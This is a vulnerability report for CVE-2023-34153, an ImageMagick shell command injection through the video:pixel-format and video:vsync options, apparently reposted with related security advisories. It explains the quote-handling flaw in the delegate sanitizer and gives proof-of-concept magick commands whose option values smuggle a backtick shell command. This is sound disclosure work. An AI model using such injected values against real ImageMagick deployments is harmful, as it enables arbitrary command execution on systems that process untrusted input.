Headline
CVE-2023-34153: Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. · Issue #6338 · ImageMagick/ImageMagick
A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.
ImageMagick version
7.1.0-1
Operating system
Linux
Operating system, version and so on
Any
Description
In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29599.
In commit cc4638d, extra options are supported in VIDEO decode delegate execution, and through later commits, ImageMagick supports user-defined options video:vsync and video:pixel-format, with their values concatenated into delegate command executed via ExternalDelegateCommand.
In ExternalDelegateCommand, the command string is sanitized with SanitizeString, scanned for illegal chars then system(). However, the illegal char set contains only "&;<>|", not quot (see link). This is the same mistake as in sanitizing -authenticate parameter in PDF password support, but the common vulnerability in ExternalDelegateCommand did not get fixed.
Steps to Reproduce****Trigger the vulnerability in VIDEO decoding
Given a normal video file, namely test.mov, the following demonstrates how command injection happens.
/data/home/fullwaywang/exp ➜ echo ‘deadbeef’ > test.txt
/data/home/fullwaywang/exp ➜ magick identify -define video:pixel-format=’rgba"`cat test.txt > /tmp/leak.txt`"’ test.mov >info.log
/data/home/fullwaywang/exp ➜ tail info.log test.mov[891] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.320u 0:00.312 test.mov[892] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.310u 0:00.298 test.mov[893] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.290u 0:00.285 test.mov[894] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.280u 0:00.271 test.mov[895] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.260u 0:00.258 test.mov[896] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.250u 0:00.244 test.mov[897] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.230u 0:00.231 test.mov[898] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.220u 0:00.218 test.mov[899] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.210u 0:00.204 test.mov[900] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 445.5MiB 0.200u 0:00.191
/data/home/fullwaywang/exp ➜ cat /tmp/leak.txt deadbeef
Trigger the vulnerability in VIDEO encoding
Given a normal image file, namely smile.gif, the following demonstrates how command injection happens.
/data/home/fullwaywang/exp ➜ magick convert -define video:pixel-format=’rgba"`cat test.txt > /tmp/leak3.txt`"’ smile.gif smile.mov
/data/home/fullwaywang/exp ➜ cat /tmp/leak3.txt deadbeef
Images
No response
Reporter
fullwaywang
Related news
Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.
Gentoo Linux Security Advisory 202405-2 - Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. Versions greater than or equal to 6.9.13.0 are affected.
Ubuntu Security Notice 6200-1 - It was discovered that ImageMagick incorrectly handled the "-authenticate" option for password-protected PDF files. An attacker could possibly use this issue to inject additional shell commands and perform arbitrary code execution. This issue only affected Ubuntu 20.04 LTS. It was discovered that ImageMagick incorrectly handled certain values when processing PDF files. If a user or automated system using ImageMagick were tricked into opening a specially crafted PDF file, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 20.04 LTS.
ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.